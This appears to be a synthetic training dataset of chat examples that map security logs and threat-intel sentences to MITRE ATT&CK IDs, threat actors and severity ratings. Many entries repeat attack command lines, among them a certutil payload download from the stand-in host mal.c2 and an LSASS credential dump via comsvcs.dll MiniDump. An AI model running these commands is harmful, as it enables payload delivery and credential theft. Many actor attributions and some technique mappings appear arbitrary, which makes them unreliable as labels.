messages listlengths 2 2 |
|---|
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: BlackMould can run cmd.exe with parameters.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.52.116.203",
"role": "user"
},
{
"content": "{\"tactics\": [... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-6AGZDNGQR8)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Initial Access, Privilege Escalation",
"role": "user"
... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Orz can gather the victim's Internet Explorer version.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1518\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.152.176.87",
"role": "user"
},
{
"content": "{\"tactics\": [... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-OF3GZV7TKK)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Collection, Command and Control, Execution",
"role": "user"
},
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"confidence\":... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-9RLW6SC8V0)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Command and Control, Discovery",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Cannon can gather system information from the victim’s machine such as the OS version, machine name, and drive information.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-3VTR5D7HWR)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Privilege Escalation, Exfiltration, Defense Evasion",
"role": "user"
}... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.183.127.18",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0008\", \"TA0043\"], \"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor and investigate attempts to modify ACLs and file/directory ownership.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1222.002\", \"T1222\"]}",
"role": "assistant"
... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Ke3chang has obtained and used tools such as Mimikatz.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1588\", \"T1588.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.133.155.102",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0040\"], \"techniqu... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-668SHYUE3A)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\":... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: BlackTech has used spearphishing e-mails with links to cloud services to deliver malware.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1566\", \"T1566.002\"]}",
"role": "assistant"
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2113 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confid... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3998 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.171.41.5",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", \"TA0002\"... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.18.222.253",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-ES310KM2XN)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severity\": \"... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The Launch Agent name may be disguised by using a name from the related operating system or benign software.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543.001\", \"T1543\... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3650 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.118.55.136",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA000... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: KGH_SPY can perform keylogging by polling the GetAsyncKeyState() function.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1056.001\", \"T1056\"]}",
"role": "as... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Ensure containers are not running as root by default.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0004\"], \"techniques\": [\"T1609\", \"T1611\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"techniques\": ... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.130.92.218",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1530 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.41.11.56",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0001\", \"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2696 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", \"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.85.156.22",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: DarkWatchman can query the Registry to determine if it has already been installed on the system.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1012\"]}",
"role": "assista... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.162.218.174",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Sp... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-Q1ZZ3LTA2A)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Command and Control",
"role": "user"
},
{
"content": "{\"severity\": \"C... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confide... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: SMOKEDHAM has added created user accounts to local Admin groups.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1098\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, TLS, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confid... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for suspicious use of gpresult.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1615\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications.",
"role": "user"
... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.120.203.244",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0040\"], \"technique... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2831 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.50.245.188",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Derusbi gathers the name of the local host, version of GNU Compiler Collection (GCC), and the system information about the CPU, machine, and operating system.",
"role": "user"
},
{
"content": "{\"tactics\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, Base64, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"confid... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-0V4CQGT6FA)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Execution, Impact",
"role": "user"
},
{
"content": "{\"sever... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3728 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.108.94.108",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techni... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-L85RA8ONNH)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Impact, Privilege Escalation",
"role": "user"
},
{
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: LightNeuron encrypts its configuration files with AES-256.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Filters are implemented as DLLs containing a method to validate potential passwords against password policies.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0005\", \"TA0006\"], \"techniques\": [\"T1556.0... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-Z2W15D38FA)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Persistence, Exfiltration",
"role": "user"
},
{
... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2304 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.102.209.228",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0008\"]... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3323 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidence\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-T6Z5JZIS6F)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Discovery",
"role": "user"
},
{
"content": "{\"severi... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.14.147.170",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1566... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-3B9TB7HLVS)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Command and Control",
"role": "user"
},
{
"content": "{\"se... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1467 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Base64, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confide... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1030 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.155.157.217",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2068 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.131.210.115",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0006\"], \"techniques\": [... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2444 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.144.10.105",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"]... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2531 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.95.249.56",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1021.006... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-9TVGMOL9IK)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severity\":... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confid... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: Spearphishing via Service).",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"],... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-L6SR63H4L3)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Exfiltration, Credential Access, Reconnaissance",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-FCAYOWEAAD)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Credential Access, Persistence, Execution",
"role": "user"
},
{
"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.88.3.114",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0043\... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3176 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.182.218.86",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: APT3 has a tool that can enumerate the permissions associated with Windows groups.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1069\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-YQWOZSC3F6)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Credential Access, Reconnaissance, Command and Control",
"role": "user... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, LOLBin, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2120 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"con... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: nltest /domain_trusts",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1482\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2684 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confiden... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, TLS, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"c... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, JA3 Spoof, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"c... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.96.174.195",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"TA... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-PHXQ6N0BMB)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Command and Control, Privilege Escalation",
"role": ... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: While use of Virtualization/Sandbox Evasion may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and on... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.163.124.37",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"t... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2721 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\"... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.105.95.81",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA00... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 786 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.89.111.217",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"]... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2494 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Base64, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"conf... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: MESSAGETAP stored targeted SMS messages that matched its target list in CSV files on the compromised system.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1074.001\", \... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, Fileless, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spid... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidence\": \"Hi... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-XE9Z0RL21G)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\": \"Cr... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-PMYNITU3T2)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Credential Access",
"role": "user"
},
{
"content": "{\"s... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1967 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidence... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: NanHaiShu can gather information about the victim proxy server.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-J3S6VKGMF7)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Lateral Movement",
"role": "user"
},
{
"content": "{\"severity\"... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA004... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-AXH4JEU29G)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Initial Access, Command and Control",
"role": "user"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confid... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern: [a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com VBScript #2 “msht... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2842 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Base64, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1852 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confid... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Kinsing has created and run a Bitcoin cryptocurrency miner.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1496\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: User file association preferences are stored under [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts and override associations configured under [HKEY_CLASSES_ROOT].",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, TLS, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"conf... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.